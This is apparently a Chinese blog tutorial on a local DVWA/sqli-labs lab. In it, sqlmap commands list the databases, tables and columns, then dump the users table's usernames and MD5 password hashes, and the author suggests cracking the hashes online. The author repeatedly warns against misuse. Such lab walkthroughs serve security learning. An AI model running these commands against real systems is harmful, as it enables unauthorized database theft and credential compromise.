sqlmap爆破dvwa数据库

本文介绍了如何在Kali Linux中使用sqlmap工具对靶机DVWA进行SQL注入攻击,包括获取靶机IP、爆破数据库列表、表名、列名并最终脱库获取用户信息。强调了技术的合法使用和网络安全法的重要性。
摘要由CSDN通过智能技术生成

基础环境:

  • 靶场搭建dvwa以及sqlilab
  • kali中的sqlmap使用

技术虽好,切勿滥用,遵守网络安全法!!!
技术虽好,切勿滥用,遵守网络安全法!!!
技术虽好,切勿滥用,遵守网络安全法!!!
技术虽好,切勿滥用,遵守网络安全法!!!
技术虽好,切勿滥用,遵守网络安全法!!!


  1. 获取目标 靶机IP
    在这里插入图片描述

  2. 获取目标靶机的IP和端口以后,打开kali ,准备用sqlmap进行爆破
    在这里插入图片描述

  3. sqlmap -u “192.168.1.215/sqllabs/Less-1/?id=1” --dbs

    • -u 设置目标主机以及路径
    • –dbs 爆破数据库
      在这里插入图片描述
      在这里插入图片描述
      此处可以看到爆破出的 数据库 列表
      在这里插入图片描述
  4. sqlmap -u “192.168.1.215/sqllabs/Less-1/?id=1” -D dvwa --tables

    • -D 根据上面的爆破结果指定数据库
    • –tables 爆破dvwa数据库的所有表
      在这里插入图片描述
      此处可以看到所有dvwa的表
  5. sqlmap -u “192.168.1.215/sqllabs/Less-1/?id=1” -D dvwa -T users --columns

    • -T 指定表名
    • –columns 爆破所有的列
      在这里插入图片描述
      得到 dvwa 数据库 users 表中的所有列
  6. sqlmap -u “192.168.1.215/sqllabs/Less-1/?id=1” -D dvwa -T users -C user,password --dump

    • -C 指定列名(可指定多个,用英文逗号隔开)
    • –dump 脱库(得到列中的字段内容)
      在这里插入图片描述
  7. 爆破完成,得到用户名以及对应的MD5加密的密码,将密文复制到对应网站解密即可。


重要

技术虽好,切勿滥用,遵守网络安全法!!!
技术虽好,切勿滥用,遵守网络安全法!!!
技术虽好,切勿滥用,遵守网络安全法!!!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

生于尘埃

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值